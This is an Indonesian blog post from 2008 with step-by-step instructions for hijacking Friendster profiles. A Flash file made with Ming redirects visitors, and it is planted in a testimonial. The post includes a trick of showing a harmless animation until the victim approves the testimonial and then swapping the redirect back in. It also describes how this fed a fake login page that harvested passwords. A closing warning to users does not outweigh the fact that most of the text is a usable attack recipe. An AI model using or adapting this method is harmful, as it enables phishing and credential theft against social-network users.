Hack Friendster
April 24th, 2008 by cangaksiaDalam artikel saya sebelumnya mengenai Friendster palsu, teknik yang digunakan untuk me-redirect suatu profile dari Friendster adalah dengan menggunakan flash. Sekarang saya ingin memberikan contoh bagaimana kita me-redirect profile Friendster seseorang menuju URL yang kita inginkan. Pertama kita buat script flash sederhana seperti kode dibawah ini. Untuk yang menggunakan linux, install Ming package
terlebih dahulu. Ming adalah library yang dapat menghasilkan file
Macromedia Flash (.swf). Jika anda menggunakan ubuntu dan belum
menginstall, jalankan perintah berikut :
apt-get install libming-util
Jika Ming berhasil diinstal, buat sebuah file dengan editor anda yang berisi kode berikut dan simpan dengan nama flash.as :
getURL("http://www.contoh.com");
misalkan seperti berikut :
getURL("http://chaidir.wordpress.com");
Setelah itu buat file flash (.swf) dengan menjalankan perintah berikut :
chaidir@osxbuntu:~$ /usr/lib/libming/bin/makeswf flash.as
Jika berhasil, maka akan dihasilkan file Flash bernama out.swf. File ini ketika diakses dari browser, akan me-redirect ke URL yang kita definisikan sebelumnya. Contohnya silahkan akses flash yang telah saya buat disini. Apabila anda mengakses url tersebut, maka anda langsung ‘diarahkan’ menuju http://chaidir.wordpress.com.
Selanjutnya upload file flash tadi (out.swf) ke tempat yang mudah
diakses. Misalkan di http://numpang.com/out.swf. Setelah itu, kirim
testimonial ke orang yang ingin di berikan testimonial dengan
memasukkan file flash ini.
Jangan mengirimkan testimonial ini keteman anda, karena profile teman anda tidak akan bisa diakses!
Caranya masukkan kode berikut :
<object classid=’clsid:D27CDB6E-AE6D-11cf-96B8-444553540000′
codebase=’http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0′
width=’400′ height=’250′><param name=’movie’ value=’http://numpang.com/out.swf‘ /><param name=’quality’ value=’high’ /><embed src=’http://numpang.com/out.swf‘
quality=’high’
pluginspage=’http://www.macromedia.com/go/getflashplayer’
type=’application/x-shockwave-flash’ width=’400′ height=’250′
allowScriptAccess=”never”></embed></object>
Untuk mencoba apakah testimonial ini berhasil, klik priview. Agar sang penerima testimonial bisa meng-approve testimonial, hapus
ganti file flash tadi terlebih dahulu (http://numpang.com/out.swf)
dengan flash animasi yang menarik perhatian. Misalnya dengan flash dari
Babaflash Forum. Baru setelah di approve, aktifkan ganti lagi (upload lagi) dengan file flash tadi.
Nah, dalam contoh kasus di Friendster palsu, sang cracker me-redirect setiap user yang ingin melihat profile yang sudah disusupi flash tadi dan mengarahkannya ke http://www.friendster.co.nr. Dan
celakanya disitu dibuat halaman yang menyerupai halaman login
Friendster dan seolah-olah terjadi kesalahan yang mengharuskan setiap
user memasukkan email dan passwordnya.
‘Fasilitas’ untuk mengirimkan testimonial di Friendster inilah yang
dimanfaatkan cracker untuk ‘mengelabuhi’ orang-orang yang sering
bermain-main dengan Friendster. Oleh karena itu, berhati-hatilah
terhadap testimonial yang menggunakan flash. Jika mendapatkan
testimonail dari orang yang tidak dikenal (emang bisa ya?) atau flash
yang ngga penting, lebih baik tidak usah di approve aja.
Pesan buat anak2 ABG pecinta Friendster :
Dan buat anak2 ABG yang sering ke warnet hanya untuk ber-Friendster
ria.. apakah tidak ada aktivitas lain di internet selain
ber-Friendsteran?! Sangat sayang sekali jika kamu ke warnet cuman liat
cowo2 ato cewe2 yang friendsterGenic (keren di
friendster doang!) Mendingan belajar cari informasi yang menarik atau
belajar apapun dari Internet. Atau lebih baik lagi klo kamu buat buat
blog sendiri. Selain belajar nulis, kamu kan juga bisa nambah temen
baru. Rugi loh klo bayar 3000 - 4000 perak cuman buat ngeliat
Friendster doang, mendingan buat beli bakso!
Referensi :
http://ezinearticles.com/?Redirect-Your-MySpace-Traffic-With-Flash&id=364276
Sekilas info :
ternyata http://www.friendster.co.nr dah diubah toh… hihihi :-D. Maaf ya kk.. dah publish ‘karya’ kamu ![]()
by: Chaidir

none)): etnkyus